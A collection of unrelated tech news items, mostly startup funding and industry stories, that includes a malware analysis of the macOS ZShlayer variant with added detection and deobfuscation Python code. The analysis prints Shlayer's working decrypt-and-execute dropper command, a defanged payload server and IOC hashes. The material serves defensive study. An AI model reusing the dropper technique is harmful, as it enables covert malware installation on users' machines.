Xometry raises $75M Series E to expand custom manufacturing marketplace

When companies need to find manufacturers to build custom parts, it’s not always an easy process, especially during a pandemic. Xometry, a seven-year-old startup based in Maryland, has built an online marketplace where companies can find manufacturers across the world with excess capacity to build whatever they need. Today, the company announced a $75 million Series E investment to keep expanding the platform.

T. Rowe Price Associates led the investment, with participation from new firms Durable Capital Partners LP and ArrowMark Partners. Previous investors also joined the round, including BMW i Ventures, Greenspring Associates, Dell Technologies Capital, Robert Bosch Venture Capital, Foundry Group, Highland Capital Partners and Almaz Capital. Today’s investment brings the total raised to $193 million, according to the company.

Company CEO and co-founder Randy Altschuler says Xometry fills a need by providing a digital way of putting buyers and manufacturers together with a dash of artificial intelligence to put the right combination together. “We’ve created a marketplace using artificial intelligence to power it, and provide an e-commerce experience for buyers of custom manufacturing and for suppliers to deliver that manufacturing,” Altschuler told TechCrunch.

The kind of custom pieces that are facilitated by this platform include mechanical parts for aerospace, defense, automotive, robotics and medical devices — what Altschuler calls mission-critical parts. Being able to put companies together in this fashion is particularly useful during COVID-19 when certain regions might have been shut down.

“COVID has reinforced the need for distributed manufacturing and our platform enables that by empowering these local manufacturers, and because we’re using technology to do it, as COVID has unfolded […] and as continents have shut down, and even specific states in the United States have shut down, our platform has allowed customers to autocorrect and shift work to other locations,” he explained.

What’s more, companies could take advantage of the platform to manufacture critical personal protective equipment. “One of the beauties of our platform was when COVID hit customers could come to our platform and suddenly access this tremendous amount of manufacturing capacity to produce this much-needed PPE,” he said.

Xometry makes money by facilitating the sale between the buyer and producer. They help set the price and then make money on the difference between the cost to produce and how much the buyer was willing to pay to have it done.

They have relationships with 5,000 manufacturers located throughout the world and 30,000 customers using the platform to build the parts they need. The company currently has around 350 employees, with plans to use the money to add more to keep enhancing the platform.

Altschuler says from a human perspective, he wants his company to have a diverse workforce because he never wants to see people being discriminated against for whatever reason, but he also says as a company with an international market, having a diverse workforce is also critical to his business. “The more diversity that we have within Xometry, the more we’re able to effectively market to those folks, sell to those folks and understand how they utilize technology. We’re just going to better understand our customer set as we [build a more diverse workforce],” he said.

As a Series E-stage company, Altschuler does not shy away from the IPO question. In fact, he recently brought in new CFO Jim Rallo, who has experience taking a company public. “The market that we operate in is so large, and there’s so many opportunities for us to serve both our customers and our suppliers, and we have to be great for both of them. We need capital to do that, and the public markets can be an efficient way to access that capital and to grow our business, and in the end that’s what we want to do,” he said.

B2B marketing company Metadata.io raises $6.5M

Metadata.io announced today that it has raised $6.5 million in Series A funding.

It’s been more than four years since I wrote about the startup’s $2 million seed funding. At the time, co-founder and CEO Gil Allouche described the product as helping business-to-business marketers target their ads as people who resemble their existing sales leads.

Since then, the company has launched its product in general availability, and Allouche told me yesterday that it’s become “really the middleware for the sales and marketing stack.”

“It doesn’t just … give you insights, it skips the human as the bottleneck of execution for marketing [operations],” Allouche said, adding that this makes marketing teams more efficient while also eliminating much of the drudgery. “If you’re a Don Draper who’s really good at creative or content, you should spend your time on that and not in an Excel spreadsheet.”

At the same time, ad targeting remains a key part of the company’s capabilities. For example, its new product MetaMatch allows advertisers to build and target custom audiences on Facebook, LinkedIn and programmatic display.

Allouche also said that demand has increased “quite significantly” since the beginning of the pandemic. That’s counter to larger digital ad trends, but he noted that B2B companies still need to reach customers, and many of the old tools — like in-person events — are now off the table.


Gil Allouche and the Metadata leadership team

In addition, he said that Metadata’s proprietary database of 1.4 billion customer profiles has given it an additional advantage in the face of privacy regulation and ad-tracking restrictions.

The platform has been used by companies including Zoom, Drift, Pendo, Udacity, and Vonage.

The new funding was led by Resolute Ventures, with participation from Greycroft, York IE, Stormbreakers, Eloqua founder Mark Organ, Segment founder Ilya Volodarsky and others.

“Metadata isn’t another marketing technology,” Organ said in a statement. “From the origin of the company transforming marketing operations by eliminating tedious manual work, to today, creating a category that transcends demand gen, it is enabling the autonomous marketer to be a reality. It is the marketer that’s needed for the future.”

Coming Out of Your Shell: From Shlayer to ZShlayer

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c "tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l"

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.
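The drop-and-execute chain above (a byte-offset tail of a carrier file, piped into openssl in decrypt mode, written under /tmp, made executable and run) is something a defender can match directly in process-execution telemetry rather than waiting for a file hash. The following Python checker is an added example, not code from the original post or from SentinelOne: it scores constructed command lines (the Shlayer command from the post, as passed to sh -c, plus three benign openssl and tail invocations that I made up) against those four indicators. The indicator names and the verdict labels are my own choices.

```python
import re

# Constructed sample of shell command lines as a process-execution log might record them.
# The first is the Shlayer command from the post (the body passed to sh -c); the others
# are benign uses of openssl and tail, included to show what does NOT trigger the rule.
SAMPLE_COMMANDS = [
    'tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | '
    'openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l '
    '-pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && '
    '/tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l',
    'openssl enc -aes-256-cbc -d -in /Users/alice/backup.tar.enc -out /Users/alice/backup.tar',
    'tail -c +100 /var/log/system.log | grep -i error',
    'openssl enc -aes-256-cbc -d -in secret.enc -out /tmp/secret.txt && cat /tmp/secret.txt',
]

# Indicator 1: a byte-offset tail of some file piped straight into openssl enc
# (the carrier file holds the encrypted payload after a fixed offset).
TAIL_PIPE_OPENSSL = re.compile(r'\btail\s+-c\s+\+\d+\b[^|]*\|\s*openssl\s+enc\b')

# Indicator 2: openssl enc in decrypt mode (-d) writing its output under /tmp.
# The "\s-d\b" guard keeps "-md md5" from being mistaken for "-d".
DECRYPT_TO_TMP = re.compile(r'\bopenssl\s+enc\b[^&|;]*\s-d\b[^&|;]*-out\s+"?(/tmp/[^\s"]+)')


def chmod_and_exec(cmd: str, path: str):
    """Return (chmod_seen, executed) for the dropped path: was it made executable
    and then run as a command in the same chain?"""
    p = re.escape(path)
    chmod = re.search(r'\bchmod\s+\S*7\S*\s+"?' + p, cmd) is not None
    execd = re.search(r'(?:&&|;|\|\|)\s*"?' + p + r'(?=\s|"|$)', cmd) is not None
    return chmod, execd


def analyze(cmd: str) -> dict:
    """Score one command line against the drop-and-execute chain."""
    indicators = []
    dropped = None
    if TAIL_PIPE_OPENSSL.search(cmd):
        indicators.append("tail_offset_piped_to_openssl")
    m = DECRYPT_TO_TMP.search(cmd)
    if m:
        dropped = m.group(1)
        indicators.append("openssl_decrypt_to_tmp")
        chmod, execd = chmod_and_exec(cmd, dropped)
        if chmod:
            indicators.append("chmod_on_dropped_file")
        if execd:
            indicators.append("dropped_file_executed")
    full_chain = {"tail_offset_piped_to_openssl", "openssl_decrypt_to_tmp",
                  "chmod_on_dropped_file", "dropped_file_executed"}
    if full_chain <= set(indicators):
        verdict = "shlayer-like"       # every link of the chain is present
    elif indicators:
        verdict = "suspicious"         # partial match, worth a human look
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": indicators, "dropped_path": dropped}


def scan(commands) -> list:
    """Analyze every command line; returns one result dict per input, in order."""
    return [analyze(c) for c in commands]


if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_COMMANDS, scan(SAMPLE_COMMANDS)):
        print(f"{result['verdict']:13} {result['indicators']}  <- {cmd[:60]}...")
```

The fourth sample (a decrypt to /tmp that is only read, never chmod'ed or executed) lands as "suspicious" rather than "shlayer-like", which is the point of scoring the links separately: a single openssl call into /tmp is common enough in admin scripts that the full chain is what makes the alert worth paging on.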

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it has not been notarized, indicating that the malware is either intended as a payload for 10.14 or earlier installations or that victims will have to be socially engineered to override the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this sample as our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to be:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon.

In BBEdit or similar text editor, we can simply search and replace every semicolon with a semicolon and newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the line breaks to local disk so that we can use it as input to a Python script for decoding. Our script will first of all replace all the variable names with the actual unicode values. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:
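The decoding procedure just described (break the script at every semicolon, collect the variable definitions, substitute them into the line that gets executed, then render the unicode escapes the way printf would) can be written as a few small functions. The block below is an added example and is not the post’s ZShlayer_decode.py nor any SentinelOne code. The obfuscated input is a constructed stand-in: I am assuming, based only on the description above, that the fragments are short-named variables holding printf-style \u escapes, that some variables reference others, and that the final statement runs the printf-rendered concatenation. The sample decodes to a harmless echo.

```python
import re

# Constructed stand-in for a ZShlayer-style first stage (assumption: fragments are
# short-named variables holding printf-style \u escapes, variables may reference other
# variables, and the final statement renders and runs the concatenation). Decoded, this
# sample only echoes a string; it is not taken from a real sample.
SAMPLE_SCRIPT = (
    '#!/bin/zsh\n'
    'Qj="\\u0065\\u0063\\u0068";Xd="\\u006f\\u0020";'
    'Pz="$Qj$Xd";'
    'TWm="$Pz\\u0064\\u0065\\u0063\\u006f\\u0064\\u0065\\u0064\\u0020'
    '\\u0073\\u0074\\u0061\\u0067\\u0065";'
    'eval "$(printf "$TWm")"\n'
)

ASSIGNMENT = re.compile(r'^(\w+)="((?:[^"\\]|\\.)*)";?$')   # NAME="value";
VAR_REF = re.compile(r'\$\{?(\w+)\}?')                        # $NAME or ${NAME}
ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')  # \uXXXX or \xXX


def split_statements(script: str) -> list:
    """Step 1: the editor trick from the post, one statement per line."""
    return [s.strip() for s in script.replace(';', ';\n').splitlines() if s.strip()]


def collect_assignments(statements) -> dict:
    """Step 2: harvest NAME="value" definitions into a lookup table."""
    env = {}
    for st in statements:
        m = ASSIGNMENT.match(st)
        if m:
            env[m.group(1)] = m.group(2)
    return env


def expand(text: str, env: dict, depth: int = 0) -> str:
    """Step 3: replace $NAME / ${NAME} with its defining value, recursively, since
    obfuscated variables commonly reference other variables."""
    if depth > 100:
        raise ValueError("variable expansion too deep; circular reference?")

    def repl(m):
        name = m.group(1)
        return expand(env[name], env, depth + 1) if name in env else m.group(0)

    return VAR_REF.sub(repl, text)


def render_escapes(text: str) -> str:
    """Step 4: what printf does with \\uXXXX and \\xXX sequences."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_first_stage(script: str, executed_var: str = "TWm") -> str:
    """Run the four steps and return the plain-text command the script would execute.
    executed_var is the variable named on the script's eval line (TWm in the post)."""
    env = collect_assignments(split_statements(script))
    if executed_var not in env:
        raise KeyError(f"{executed_var} is never assigned; use the variable on the eval line")
    return render_escapes(expand(env[executed_var], env))


if __name__ == "__main__":
    print(decode_first_stage(SAMPLE_SCRIPT))
```

The decoder never executes anything: it reproduces printf’s escape handling in Python so the decoded command can be read, and, as the post goes on to do with the second stage, inspected before any part of it is run. Real samples will differ in variable naming and quoting, so expect to adjust the ASSIGNMENT pattern; the recursive expansion and the escape rendering are the parts that carry over.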

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active with a 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a reputation score of 0/58 on VT.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts
269d5f15da3bc3522ca53a3399dbaf4848f86de35d78c636a78336d46c23951c
e3292268c1d0830e76c3e80b4ea57921b9171027e07f064ef3b867b6d0450191
93ff20ff59d4e82e9c0e3b08037c48886dc54b8ed37c19894e0a65c1af8612f6
c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580
16885c2443b610d80b30828b1445ca326adb727c48f06d073e4dcb70fe3e5c2e
1bc5d3cb3d885fad8230e01dc5f86145d16ed5552a0fa8725689635b96b681e1

Parent DMGs
f6cb7f9593d85f0cd1e81d5b9f520b74d9bf5e829206cefe05b956c0f7638c28
3e20c0b2979a368c7d38cf305f1f60693375165bb76150ad80dbd34e7e0550ed
c319761789afb6aa9cddadf340dfa2d4d659e4b420d6dfde9640cdc4c1d813b7
823c4d39b0d93a1358b4fa02539868944ce15df91f78a1142be26edf07a64a5a
45d50559f73e7c12f1d9aa06283182cb67ac953d285f044e77447569ca8a278c
f94c8712dd7716cfeac79e6e59fdca07db4452c5d239593f421f97246ee8ef41

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203



Google Cloud launches its Business Application Platform based on Apigee and AppSheet

Unlike some of its competitors, Google Cloud has recently started emphasizing how its large lineup of different services can be combined to solve common business problems. Instead of trying to sell individual services, Google is focusing on solutions and the latest effort here is what it calls its Business Application Platform, which combines the API management capabilities of Apigee with the no-code application development platform of AppSheet, which Google acquired earlier this year.

As part of this process, Google is also launching a number of new features for both services today. The company is launching the beta of a new API Gateway, built on top of the open-source Envoy project, for example. This is a fully managed service that is meant to make it easier for developers to secure and manage their API across Google’s cloud computing services and serverless offerings like Cloud Functions and Cloud Run. The new gateway, which has been in alpha for a while now, offers all the standard features you’d expect, including authentication, key validation and rate limiting.

As for its low-code service AppSheet, the Google Cloud team is now making it easier to bring in data from third-party applications thanks to the general availability to Apigee as a data source for the service. AppSheet already supported standard sources like MySQL, Salesforce and G Suite, but this new feature adds a lot of flexibility to the service.

With more data comes more complexity, so AppSheet is also launching new tools for automating processes inside the service today, thanks to the early access launch of AppSheet Automation. Like the rest of AppSheet, the promise here is that developers won’t have to write any code. Instead, AppSheet Automation provides a visual interface that, according to Google, “provides contextual suggestions based on natural language inputs.”

“We are confident the new category of business application platforms will help empower both technical and line of business developers with the core ability to create and extend applications, build and automate workflows, and connect and modernize applications,” Google notes in today’s announcement. And indeed, this looks like a smart way to combine the no-code environment of AppSheet with the power of Apigee.

Progress snags software automation platform Chef for $220M

Progress, a Boston-area developer tool company, boosted its offerings in a big way today when it announced it was acquiring software automation platform Chef for $220 million.

Chef, which went 100% open source last year, had annual recurring revenue (ARR) of $70 million from the commercial side of the house. Needless to say, Progress CEO Yogesh Gupta was happy to bring the company into the fold and gain not only that revenue, but a set of highly skilled employees, a strong developer community and an impressive customer list.

Gupta said that Chef fits with his company’s acquisition philosophy. “This acquisition perfectly aligns with our growth strategy and meets the requirements that we’ve previously laid out: a strong recurring revenue model, technology that complements our business, a loyal customer base and the ability to leverage our operating model and infrastructure to run the business more efficiently,” he said in a statement.

Chef CEO Barry Crist offered a typical argument for an acquired company: that Progress offered a better path to future growth, while sending a message to the open-source community and customers that Progress would be a good steward of the startup’s vision.

“For Chef, this acquisition is our next chapter, and Progress will help enhance our growth potential, support our Open Source vision, and provide broader opportunities for our customers, partners, employees and community,” Crist said in a statement.

Chef’s customer list is certainly impressive, and includes tech industry stalwarts like Facebook, IBM and SAP, as well as non-tech companies like Nordstrom, Alaska Airlines and Capital One.

The company was founded in 2008 and had raised $105 million, according to Crunchbase data. It hadn’t raised any funds since 2015, when it raised a $40 million Series E led by DFJ Growth. Other investors along the way included Battery Ventures, Ignition Partners and Scale Venture Partners.

The transaction is expected to close next month, pending normal regulatory approvals.

Hasura raises $25 million Series B and adds MySQL support to its GraphQL service

Hasura, a service that provides developers with an open-source engine that provides them a GraphQL API to access their databases, today announced that it has raised a $25 million Series B round led by Lightspeed Venture Partners. Previous investors Vertex Ventures US, Nexus Venture Partners, Strive VC and SAP.iO Fund also participated in this round.

The new round, which the team raised after the COVID-19 pandemic had already started, comes only six months after the company announced its $9.9 million Series A round. In total, Hasura has now raised $36.5 million.

“We’ve been seeing rapid enterprise traction in 2020. We’ve wanted to accelerate our efforts investing in the Hasura community and our cloud product that we recently launched and to ensure the success of our enterprise customers. Given the VC inbound interest, a fundraise made sense to help us step on the gas pedal and give us room to grow comfortably,” Hasura co-founder and CEO Tanmai Gopal told me.

In addition to the new funding, Hasura also today announced that it has added support for MySQL databases. Until now, the company’s service only worked with PostgreSQL databases.


Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right). Image Credits: Hasura

As the company’s CEO and co-founder Tanmai Gopal told me, MySQL support has long been at the top of the most requested features by the service’s users. Many of these users — who are often in the healthcare and financial services industry — are also working with legacy systems they are trying to connect to modern applications and MySQL plays an important role there, given how long it has been around.

In addition to adding MySQL support, Hasura is also adding support for SQL Server to its lineup, but for now, that’s in early access.

“For MySQL and SQL Server, we’ve seen a lot of demand from our healthcare and financial services / fin-tech users,” Gopal said. “They have a lot of existing online data, especially in these two databases, that they want to activate to build new capabilities and use while modernizing their applications.”

Today’s announcement also comes only a few months after the company launched a fully managed cloud service for its service, which complements its existing paid Pro service for enterprises.

“We’re very impressed by how developers have taken to Hasura and embraced the GraphQL approach to building applications,” said Gaurav Gupta, partner at Lightspeed Venture Partners and Hasura board member. “Particularly for front-end developers using technologies like React, Hasura makes it easy to connect applications to existing databases where all the data is without compromising on security and performance. Hasura provides a lovely bridge for re-platforming applications to cloud-native approaches, so we see this approach being embraced by enterprise developers as well as front-end developers more and more.”

The company plans to use the new funding to add support for more databases and to tackle some of the harder technical challenges around cross-database joins and the company’s application-level data caching system. “We’re also investing deeply in company building so that we can grow our GTM and engineering in tandem and making some senior hires across these functions,” said Gopal.

The $10B JEDI contract is locked, loaded and still completely stuck

The other day I took a moment to count the number of stories we’ve done on TechCrunch on the DoD’s $10 billion, decade-long, winner-take-all JEDI cloud contract. This marks the 30th time we’ve written about this deal over the last two years, and it comes after a busy week last week in JEDI cloud contract news.

That we’re still writing about this is fairly odd if you consider the winner was announced last October when the DoD chose Microsoft, but there is no end in sight to the on-going drama that is this procurement process.

Government contracts don’t typically catch our attention at TechCrunch, but this one felt different early on. There was the size and scope of the deal of course. There was the cute play on the “Star Wars” theme. There was Oracle acting like a batter complaining to the umpire before the first pitch was thrown. There was the fact that everyone thought Amazon would win until it didn’t.

There was a lot going on. In fact, there’s still a lot going on with this story.

Oracle doth protest too much

Let’s start with Oracle, which dispatched CEO Safra Catz to the White House in April 2018 even before the RFP had been written. She was setting the stage to complain that the deal was going to be set up to favor Amazon, something that Oracle alleged until the day Microsoft was picked the winner.

Catz had been on the Trump transition team and so had the ear of the president. While the president certainly interjected himself in this process, it’s not known how much influence that particular meeting might have had. Suffice to say that it was only the first volley in Oracle’s long war against the JEDI contract procurement process.

It would include official complaints with the Government Accountability Office and a federal lawsuit worth, not coincidentally, $10 billion. It would claim the contract favored Amazon. It would argue that the one-vendor approach wasn’t proper. It would suggest that because the DoD had some former Amazon employees helping write the RFP, it somehow favored Amazon. The GAO and two court cases found otherwise, ruling against Oracle every single time.

It’s worth noting that the Court of Appeals ruling last week indicated that Oracle didn’t even meet some of the basic contractual requirements, all the while complaining about the process itself from the start.

Amazon continues to press protests

Nobody was more surprised that Amazon lost the deal than Amazon itself. It still believes to this day that it is technically superior to Microsoft and that it can offer the DoD the best approach. The DoD doesn’t agree. On Friday, it reaffirmed its choice of Microsoft. But that is not the end of this, not by a long shot.

Amazon has maintained since the decision was made last October that the decision-making process had been tainted by presidential interference in the process. They believe that because of the president’s personal dislike of Amazon CEO Jeff Bezos, who also owns the Washington Post, he inserted himself in the process to prevent Bezos’ company from winning that deal.

In January, Amazon filed a motion to stop work on the project until this could all be sorted out. In February, a judge halted work on the project until Amazon’s complaints could be heard by the court. It is September and that order is still in place.

In a blog post on Friday, Amazon reiterated its case, which is based on presidential interference and what it believes is technical superiority. “In February, the Court of Federal Claims stopped performance on JEDI. The Court determined AWS’s protest had merit, and that Microsoft’s proposal likely failed to meet a key solicitation requirement and was likely deficient and ineligible for award. Our protest detailed how pervasive these errors were (impacting all six technical evaluation factors), and the Judge stopped the DoD from moving forward because the very first issue she reviewed demonstrated serious flaws,” Amazon wrote in the post.

Microsoft for the win?

Microsoft on the other hand went quietly about its business throughout this process. It announced Azure Stack, a kind of portable cloud that would work well as a field operations computer system. It beefed up its government security credentials.

Even though Microsoft didn’t agree with the one-vendor approach, indicating that the government would benefit more from the multivendor approach many of its customers were taking, it made clear that if those were the rules, it was in it to win it — and win it did, much to the surprise of everyone, especially Amazon.

Yet here we are, almost a year later and in spite of the fact that the DoD found once again, after further review, that Microsoft is still the winner, the contract remains in limbo. Until that pending court case is resolved, we will continue to watch and wait and wonder if this will ever be truly over, and the JEDI cloud contract will actually be implemented.

Microsoft Patch Tuesday, Sept. 2020 Edition

Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users.

The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.

Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server.

“That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” said Dustin Childs, of Trend Micro’s Zero Day Initiative. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon. This should be your top priority.”

Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019.

Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future.

Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates.

Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.

Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates have even been known to erase or corrupt files.

So do yourself a favor and back up before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

The Good, the Bad and the Ugly in Cybersecurity – Week 36

The Good

A Colorado man named Bryan Connor Herrell, who worked as a moderator on the now-defunct Darknet site “AlphaBay Market”, was sentenced to 11 years in prison by the U.S. District Court.

The site, which was taken down in a joint operation by the FBI along with Thai and Canadian police, served as a marketplace for buyers and sellers of guns, stolen identity information, credit card numbers and other illicit materials. At one time, AlphaBay was the world’s largest online drug marketplace. As a moderator, Herrell helped settle disputes between buyers and sellers. He was clearly dedicated to his work, helping to resolve over 20,000 such disputes.

Herrell’s capture came as a result of the site’s founder and admin Alexandre Cazes being arrested in Thailand in 2017. Cazes, who was subsequently found dead in his prison cell only a few days later, kept a laptop full of incriminating evidence. The FBI seized the device and was able to retrieve troves of information related to the site’s infrastructure and staff, including the involvement of Herrell. While Herrell’s trial took several years to conclude, the sentence is severe and should serve as a warning to others interested in exploring the murky paths of the criminal underground.

Other good news this week comes from Facebook and Twitter, both of which suspended several accounts affiliated with Russian State actors. The accounts belonged to “PeaceData”, a fake news website publishing misleading articles about world politics.

The two social networks said they started an investigation into accounts associated with the site after they received a tip from the FBI earlier this summer. The information was also passed to the independent research body Graphika, which confirmed that the site and its associated social media assets were linked to the infamous Russian troll farm “Internet Research Agency” (IRA).

Hopefully, this action is a sign of social media platforms starting to take a more determined stand against fake news and online manipulation.

The Bad

The Parliament of Norway, also known as “The Storting”, was the target of a cyber attack this week that breached the email accounts of several MPs and members of staff. Emails belonging to the Conservative party (Høyre) were among those hacked, but it is unknown at this point if the account of PM Erna Solberg or any government ministers were affected. The opposition Labour party (Arbeiderpartiet) email account was also hacked, suggesting the attack was conducted by an external perpetrator.

“This has been a significant attack,” said Marianne Andreassen, the parliament’s non-elected chief administrator. “Today’s threat situation is challenging, and IT security is something that we are always reviewing. New measures to reinforce security in the Storting are continually being assessed,” she added.

The Parliament has reported the incident to the Norwegian Police Security Service (PST), which then tweeted that it was investigating the case. The next Norwegian parliamentary election is scheduled to be held a year from now, in September 2021, and the fear is that this attack might be a prelude to foreign interference in that election.

The Ugly

Still with politics and cybercrime, the Twitter account of the personal website of Indian Prime Minister Narendra Modi was also hacked this week. The perpetrators posted a series of tweets appealing to his 2.5 million followers to donate to the PM National Relief Fund with Bitcoin.

The tweets read, “I appeal to you all to donate generously to PM National Relief Fund for Covid-19, Now India begin with cryptocurrency.”

Subsequent tweets revealed the identity of the hackers to be a group called “John Wick” (referencing the movie franchise starring Keanu Reeves), which had been accused earlier this week of hacking the well-known Indian e-commerce website “Paytm Mall” and demanding a ransom. It appears that the hacking group wanted to clear its name, and so hacked a high-profile Twitter account and used it to tell the world that they were not to blame for the Paytm Mall hack.

